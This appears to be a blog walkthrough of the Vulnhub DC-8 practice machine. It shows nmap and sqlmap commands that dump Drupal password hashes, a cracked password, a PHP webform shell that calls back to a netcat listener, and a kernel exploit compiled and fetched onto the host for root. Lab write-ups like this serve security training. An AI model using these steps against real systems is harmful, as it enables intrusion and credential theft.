Vulnhub DC-8 Walkthrough

We start scanning the host with nmap –A –T4 –p- 192.168.1.5 –vv

Scanning directories with dirb came with:

Ok the robots.txt file came with a lot to know:

We can see from the robots.txt file there are some sql databases on the site, we need to find it to exploit it with sqlmap, so let’s visit the links on the site:

sqlmap -u 192.168.1.5/?nid=1 –dbs –batch –risk 3 –level 5

sqlmap -u 192.168.1.5/?nid=1 -D d7db –tables –batch –risk 3 –level 5

sqlmap -u 192.168.1.5/?nid=1 -D d7db -T users –columns –dump

Now we have 2 users with hash passwords:

admin   | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

john    | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

using John to crack the hash, john hash camw with password turtle, while the admin hash looks like is going to take time as maybe it’s not meant to be cracked, so let’s use john’s password to login.

We going to use the link to login http://192.168.1.5/user/

Now navigate to this webpage http://192.168.1.5/user#overlay=node/3/webform/configure and change Text Format to PHP

Now let’s upload a php shell code to this page:

After that we go to the contacts page and fill it with anything and click submit while on our end there is a nc with the port 444 which I use ready for the connection to be made.

Ok now I used a tool called linux-exploit-suggester.sh and searched for the exploit on my machine using searchsploit and located it, then complied it with gcc, then transfer to the host using wget and SimpleHTTPServer.

Locate 45010.c

Gcc –o hack2 45010.c

Change directory to /root and cat flag.txt and we are done!!!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s